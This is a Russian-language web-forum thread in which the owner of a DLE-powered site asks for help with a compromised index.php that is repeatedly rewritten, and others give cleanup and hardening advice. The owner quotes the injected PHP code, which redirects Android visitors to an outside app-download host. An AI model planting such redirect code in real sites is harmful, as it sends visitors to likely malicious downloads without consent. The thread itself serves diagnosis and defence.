RUS_D 0 Опубликовано: 7 октября 2014 Рассказать Опубликовано: 7 октября 2014 На сайте http://stalker-worlds.ru/ происходит несанкционированная модификация index.php Версия DLE 10, заплатка стоит В файле сносится половина кода и вставляется такой код в самом верху <?php $ua = $_SERVER['HTTP_USER_AGENT']; if(stripos("***$ua",'android') !== false){ header("Location: http://download-app.org/m/?mobile_version=stalker-worlds"); die(); } ?> Соответственно видим пустой белый лист в Админку зайти могу. Замена на оригинальный исправляет ситуацию минут на 10, потом тоже самое. Атрибуты только чтения для файла толку не приносят. Нашёл папку с двумя php файлами (вчера была создана) тогда же начались и проблемы - снёс. Но не помогло. Больше изменённых файлов не нашёл Где то есть дыра? И идёт постоянная атака на админку - подбор паролей, уже заблокировал штук с 30 IP в .htaccess Цитата Ссылка на сообщение Поделиться на других сайтах
Captain 623 Опубликовано: 7 октября 2014 Рассказать Опубликовано: 7 октября 2014 admin.php не судьба переименовать? А также поставить заплатки для своей версии и заменить файлы дистрибутива на оригинальные? + купить лицензию, если этого ещё не сделали. Цитата Ссылка на сообщение Поделиться на других сайтах
RUS_D 0 Опубликовано: 7 октября 2014 Рассказать Опубликовано: 7 октября 2014 (изменено) Автор Лицензия куплена год назад (через полмесяца надо продлять), файлы все оригинальные, не считая подключенных модулей (фотокаталог и файловый каталог). Переименовывание admin.php результата не давало Правда не чистил кеш - может его снести вручную? Изменено 7 октября 2014 пользователем RUS_D Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 072 Опубликовано: 8 октября 2014 Рассказать Опубликовано: 8 октября 2014 У вас на сервере находится шелл, или уязвимо серверное ПО, либо у вас украли ваши доступы к серверу. Вам необходимо полностью восстановить оригинальные файлы скрипта на сервере, заменив их на файлы из оригинального дистрибутива. Если пользуетесь старыми версиями скрипта, то проверить и установить все патчи безопасности http://dle-news.ru/bags/ . Далее Вам необходимо проверить все свои сайты на вашем аккаунте на сервере, если у вас их несколько на наличие посторонних файлов. В DLE это можно сделать в админпанели антивирусом, и необходимо удалить все на что он укажет без исключения, в том числе и все сторонние модули если они есть. Далее сменить все пароли без исключения на доступ к серверу. Проверить свой компьютер антивирусами с последними обновлениями. Обратиться к хостинг провайдеру чтобы проверили входил ли кто на сервер по FTP или в панель управления хостингом не с вашего IP и соответственно ограничить доступ к вашему серверу по IP Цитата Ссылка на сообщение Поделиться на других сайтах
RUS_D 0 Опубликовано: 8 октября 2014 Рассказать Опубликовано: 8 октября 2014 Автор Спасибо за совет. Пароли на FTP и вход на сервер сменил сразу , как и пароль до БД (использую VPS сервер) Есть бекап сайта до возникновения проблем - сегодня скачаю проверю пофайлово. Заплатки стоят. По логу не вижу чтобы кто то входил - резвеч то гдето есть дыра в безопасности сервера. Кстати ночью заменил на оригинал, выставил атрибуты только чтение - на утро файл опять модифицирован Модули стоят только три - интеграция с IPB by kaliostro, фотокаталог и каталог файлов не может быть такого изза них? (нет статистики по безопасности этих модулей) Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 072 Опубликовано: 8 октября 2014 Рассказать Опубликовано: 8 октября 2014 Есть бекап сайта до возникновения проблем - сегодня скачаю проверю пофайлово. Файлы нужно ставить оригинальные а не до возникновения проблем, внедрить вам код могли задолго, но не пользоваться им до определенного момента времени. Модули стоят только три - интеграция с IPB by kaliostro, фотокаталог и каталог файлов не может быть такого изза них? (нет статистики по безопасности этих модулей) Все может быть, я не могу поручится за их безопасность, потому как мне они неизвестны. Кстати ночью заменил на оригинал, выставил атрибуты только чтение - на утро файл опять модифицирован Если это было через шелл, то ваш сервер настроен небезопасно. Не используйте режми CGI и fast-cgi для PHP, т.к. без должной настройки по умолчанию они дают полный контроль над файловой системой для скриптов. Лучше использовать PHP как модуль Апача. Или корректно адаптировать сервер для режиме CGI и fast-cgi чтобы у них не было доступов. На сервере также нужно обновлять все серверное ПО, потому как например уязвимости подобные этой http://habrahabr.ru/post/238021/ дают злоумышленникам полный контроль над вашим сервером. Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.